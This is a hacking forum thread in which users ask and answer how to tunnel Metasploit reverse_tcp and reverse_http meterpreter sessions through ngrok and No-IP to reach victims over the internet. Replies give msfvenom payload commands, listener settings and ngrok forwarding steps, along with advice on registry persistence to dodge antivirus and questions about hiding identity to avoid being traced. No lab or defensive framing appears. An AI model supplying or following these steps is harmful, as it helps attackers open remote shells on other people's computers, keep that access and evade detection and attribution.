Forum Thread: How to Use NGROK in a Reverse_Tcp Attack?

I was thinking of using ngrok in a reverse_tcp attack over the internet on Kali Linux. But couldn't do so, I didn't get an open session, I use the ngrok url in place of the LHOST while creating the payload.

Can anyone help ?

21 Responses


Actually I have some problems with port forwarding that is why I can't use no-ip..... But ngrok works smoothly and also port forwards properly...

Though your tutorial was really impressive and informative.

yah it port forwards good set tools never worked i cant portforwards untill i used ngrok

how we can use dns in reverse_tcp !!?
i cant

I exactly have the same problem, I use Ngrok to forward the connection to localhost
as I cant forward any port on my router (too bad... old one!)

but when I set the LHOST to ngrok url and LPORT 80 in creating the payload with msfvenom I cant get a session on the console :(

what do you suggest guys ? can I use the same reversetcpdns on android ??

Hay i alsoo try every thing but can't get the meterpreter section using internet with my mobile hotspot .plzz show me the way ,for wan.

You should not cuz it changes lport and ilost everytime you run it

Hi to use ngrok in a tcp android payload (for example) you need to type :
./ngrok tcp <port>
You will get some thing like

Then make the payload with and LPORT=17565

For the listener use : lhost and lport <port> (The one used at the top)

Enjoy my help its free ! :D

./ngrok tcp <port>
Are we the one who enter port number

Are we supposed to create a New payload everytime? the port changes everytime I close the ngrok session

Yes you are supposed to create a new payload every time you close the ngrok session or you should buy a premium account perhaps

I think you could use No-IP with reverse_http (or https).
For example:
ngrok http 443
Forwarding -> localhost:443

Then create a Dynamic DNS:

Then you can just update your host, if you have a new ngrok session, and it would still work with the same payload.

Payload: msfvenom -p <platform>/meterpreter/reverse_http(s) lport=443 -o <file>

set payload <platform>/meterpreter/reverse_http(s)
set lhost
set lport 443

Hope it works ;)

So can we use Ngrok and NO-IP together? And what if we shutdown our system can we able to get listen session again when we Turn on system?

I have never really tried ngrok but from the comment you posted under, it looks like you can use No ip and ngrok. As for your other question, since the attack occurs in the victims memory, it will be killed in a system restart. To get a session again, you will need to rerun the payload on the victim computer or set up persistence. There are a few ways of setting persistence but could be detected by AV easier as you are leaving something on the hard drive. Personally I like to use Registry persistence as it only leaves files in the registry, not likely to be detected.

Well ya I can make it persistence. But do u know anyway to hide urself while doing that. Like using Whonix gateway or anonsurf while using Ngrok and NO-IP to create and listening payload?

I tried this method.Everything worked but I did not receive meterpreter session
Could you guide me with this?

how we can be anonymous while using metasploit listener ? any help please :) thanks :)

Hi how do I make a post on the forum


Umm, i got a question.. Can i use ngrok when creating payloads(msfvenom) to avoid being traced?? or is it better to use the public ip address that tor given to me .. hehehe

ty in advance
sorry for my bad english

I don't understand why people say "Sorry for my bad English" when everything they wrote makes sense.

Don't forget that if you use Ngrok to forward port 80, and you are serving your payload on your apache server with default configurations, that you will have to kill the apache server immediately after the payload is downloaded, or it will interfere with your meterpreter session. I ran into this problem on guest networks where most ports are blocked.

Share Your Thoughts

  • Hot
  • Active